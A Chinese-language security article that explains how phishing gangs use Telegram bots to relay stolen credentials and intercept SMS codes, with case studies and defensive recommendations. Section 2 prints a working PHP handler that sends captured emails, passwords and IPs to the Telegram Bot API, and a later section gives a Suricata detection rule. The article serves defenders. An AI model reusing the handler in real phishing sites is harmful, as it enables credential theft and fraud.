一、当钓鱼攻击有了“客服系统”：点击链接后，有人在Telegram上等你

2025年深秋，一位荷兰阿姆斯特丹的中小企业主收到一封看似来自本地银行ING的邮件：“您的账户因异常登录被临时冻结，请立即验证身份。”他点开链接，进入一个与ING官网几乎无异的页面，输入了用户名和密码。几秒后，页面提示“验证成功”，并跳转回真实银行首页。

一切看似正常——直到三天后，他发现账户中 €47,000 被分批转入多个加密钱包。

事后调查揭示了一个令人不安的事实：在他提交凭证的瞬间，一组位于东欧的犯罪分子正通过一个Telegram机器人实时监控他的操作。该机器人不仅自动记录了他的账号密码，还立刻向操作员推送通知：“新受害者：ING NL，已捕获凭证，等待指令。”

操作员随即通过同一机器人发送指令，触发二次验证流程，并诱导受害者在后续弹出的“安全确认”页面中输入短信验证码。整个过程耗时不到90秒，且全程由机器人协调完成，无需人工值守。

这并非孤例。据网络安全媒体《Security Chronicle World》（SC World）2025年12月发布的简报，一种以 Telegram Bot 为指挥中枢 的新型钓鱼模式正在欧洲快速蔓延。攻击者利用Telegram开放的Bot API，将钓鱼活动模块化、自动化、甚至“服务化”——从模板分发、数据回传到会话接管，全部通过聊天界面完成，宛如一个地下“钓鱼SaaS平台”。

二、技术拆解：一个Telegram机器人的完整钓鱼生命周期

要理解这种攻击为何高效，需深入其技术架构。典型的Telegram钓鱼机器人工作流如下：

阶段1：引流

攻击者通过垃圾邮件、短信或社交媒体广告，将受害者引导至高仿真钓鱼页面。例如，冒充Microsoft 365、PayPal、Revolut或本地邮政服务。

阶段2：数据捕获

钓鱼页面表单提交后，数据不直接存入数据库，而是通过后端脚本（如PHP或Node.js）调用Telegram Bot API，将信息推送至私有频道：

// phishing-handler.php 示例

$bot_token = '123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11';

$chat_id = '-1001234567890'; // 私有频道ID

$email = $_POST['email'];

$password = $_POST['password'];

$ip = $_SERVER['REMOTE_ADDR'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];

$message = "🚨 新凭证捕获\n"

. "邮箱: $email\n"

. "密码: $password\n"

. "IP: $ip\n"

. "UA: $user_agent\n"

. "时间: " . date('Y-m-d H:i:s');

// 调用Telegram API发送消息

file_get_contents("https://api.telegram.org/bot{$bot_token}/sendMessage?chat_id={$chat_id}&text=" . urlencode($message));

此代码虽简单，但效果显著：所有受害者数据实时呈现在操作员的Telegram聊天窗口中，无需登录服务器后台。

阶段3：实时交互与会话劫持

更高级的机器人支持双向交互。例如，当捕获到银行凭证后，机器人会自动向操作员提供选项按钮：

📌 受害者：mailto:revolut_user@proton.me

💳 已捕获凭证

🔘 [触发2FA] [导出Cookie] [标记高价值] [忽略]

操作员点击“[触发2FA]”后，机器人立即向钓鱼页面的后端发送指令，动态生成一个“安全验证”弹窗，要求用户输入收到的短信验证码。一旦提交，验证码同样通过Telegram回传，攻击者即可完成完整登录。

“这相当于给钓鱼团伙配了个7×24小时在线的‘作战室’。”公共互联网反网络钓鱼工作组技术专家芦笛指出，“过去需要多人协作的钓鱼行动，现在一个人加一个机器人就能搞定。”

三、为何是Telegram？开放API成双刃剑

Telegram之所以成为钓鱼团伙的首选平台，源于其三大特性：

Bot API完全开放且文档完善：开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人；

端到端加密非默认启用：普通群组和频道通信未加密，但对犯罪分子而言反而便于自动化处理（无需解密）；

全球节点分布与抗审查性：即使部分IP被封，机器人仍可通过其他出口维持服务。

据SC World监测，2025年Q4，与钓鱼活动关联的Telegram机器人数量同比增长 320%，其中 68% 针对金融与云服务凭证，22% 聚焦社交账号（如Instagram、TikTok），其余涉及游戏、电商等。

更危险的是，这些机器人常被嵌入暗网市场作为“增值服务”出售。例如，在某俄语论坛上，一套包含“钓鱼页面+Telegram回传+2FA诱导”功能的完整套件售价仅 $150/月，支持无限次部署。

四、案例复盘：德国初创公司因“云邮箱钓鱼”遭内部渗透

2025年10月，一家位于柏林的SaaS初创公司遭遇精准打击。攻击者发送伪装成“Microsoft 365存储空间不足”的邮件，内含指向 onedrive-verify[.]eu 的链接。

一名工程师点击后，输入了公司邮箱和密码。数据立即通过Telegram机器人回传。操作员识别出该账户属于IT管理员后，迅速执行以下操作：

利用凭证登录Azure AD，尝试启用Legacy Auth（旧式认证）；

因该公司未关闭IMAP，成功通过Outlook配置收取邮件；

从收件箱中找到财务系统重置链接，重置密码并导出客户数据库。

整个过程在 4小时内完成，而安全团队直到三天后才因异常登录告警介入。

事后分析发现，攻击者使用的Telegram机器人名为 @CloudGrabber_Bot，其频道中同时监控着来自12个国家的 87个活跃钓鱼站点，平均每15分钟就有一次新凭证捕获。

“这不是随机诈骗，而是工业化的情报驱动攻击。”芦笛强调，“他们知道哪些账号值钱，哪些可以忽略。”

五、防御挑战：传统网关为何“看不见”Telegram通道？

当前企业安全架构存在明显盲区：邮件网关能拦截钓鱼链接，但无法阻断数据外泄至Telegram。

原因在于：

Telegram使用标准HTTPS（端口443），流量与正常Web浏览无异；

数据回传通常通过合法CDN（如Cloudflare）中转，IP信誉良好；

消息内容为文本格式，无恶意载荷，难以触发DLP规则。

即便部署了终端检测与响应（EDR）系统，若未特别监控 api.telegram.org 的异常POST请求，也极易漏报。

对此，工作组建议采取以下技术对策：

1. 网络层：封禁高风险Telegram基础设施

在防火墙或代理中，基于威胁情报封禁已知与钓鱼相关的Telegram Bot Token、Channel ID对应的IP段；

使用DNS过滤服务（如Cisco Umbrella、Zscaler）阻止对 core.telegram.org 和 api.telegram.org 的非业务访问。

2. 应用层：部署数据外泄监测（DLP）增强规则

监控Web应用日志中向Telegram API发起的请求，尤其是包含 sendMessage、sendDocument 等关键词的POST；

对内部系统设置出站流量基线，对异常高频的小包HTTPS请求告警。

示例Suricata规则（用于检测Telegram数据回传）：

alert http any any -> any any (

msg:"Possible Credential Exfiltration to Telegram";

content:"POST"; http_method;

content:"api.telegram.org"; http_header;

content:"sendMessage"; http_uri;

pcre:"/chat_id=\-?\d{10,}/";

sid:1000001; rev:1;

)

3. 身份层：强制多因素认证（MFA）并禁用短信验证

启用FIDO2安全密钥或Authenticator App，彻底绕过短信验证码环节；

在Azure AD、Google Workspace等平台中，禁用SMS-based 2FA，因其易被实时诱导窃取。

“只要还在用短信验证码，钓鱼就永远有突破口。”芦笛直言。

六、国内启示：当“跨平台跳转”遇上微信生态，风险几何？

尽管当前Telegram钓鱼主要集中在欧洲，但其模式对中国具有强烈警示意义。

首先，国内大量企业员工习惯通过微信、钉钉接收工作通知，而这些平台同样支持小程序、H5页面跳转。若攻击者伪造“企业邮箱升级”“工资单查看”等场景，诱导用户点击内嵌链接，同样可实现凭证收割。

其次，虽然Telegram在国内受限，但类似Bot机制已在其他平台萌芽。例如，有黑产利用企业微信API搭建“客服机器人”，用于分发钓鱼问卷；或通过QQ频道机器人收集Steam账号信息。

更值得警惕的是，国内云服务商提供的Serverless函数（如阿里云函数计算、腾讯云SCF）若配置不当，可能被滥用于搭建轻量级钓鱼后端，并通过国内CDN加速，进一步规避境外威胁情报覆盖。

“我们不能只盯着Telegram，而要关注任何支持自动化消息交互的平台。”芦笛提醒，“防御的核心，是识别‘异常数据流向’，而非特定应用。”

七、SOC如何应对？从“日志堆砌”到“行为狩猎”

面对Telegram辅助的钓鱼攻击，安全运营中心（SOC）需转变思路：

不再依赖单一告警，而是构建跨域关联分析：将邮件日志、Web代理记录、身份认证事件、出站流量日志进行图谱化关联；

重点监控“短时高频”行为：例如，某用户在登录后5分钟内访问多个敏感系统，且源IP跨越不同自治系统（AS）；

部署欺骗技术（Deception）：在内网部署蜜罐邮箱，一旦其凭证被用于登录外部服务，立即触发高危告警。

此外，企业应定期开展红蓝对抗演练，模拟“Telegram机器人接管会话”场景，检验现有检测与响应能力。

八、结语：钓鱼已进入“人机协同”时代，防御必须升维

Telegram机器人的崛起，标志着网络钓鱼正式从“广撒网”走向“精准狩猎”，从“静态页面”走向“实时交互”。它模糊了传统边界安全的定义，迫使防御者思考：当攻击者用聊天软件管理犯罪时，我们的安全体系是否还停留在防火墙时代？

答案显然是否定的。未来的反钓鱼战争，不仅是技术对抗，更是速度、智能与协同的较量。正如芦笛所言：“你无法阻止每一个链接，但你可以确保即使密码泄露，攻击者也拿不走你的数字身份。”

而对每一位普通用户来说，最有效的盾牌，或许就是那句老生常谈却永不过时的忠告：永远不要在非官方页面输入账号密码——无论它看起来多么真实，也无论谁在“另一端”等着你。

编辑：芦笛（公共互联网反网络钓鱼工作组）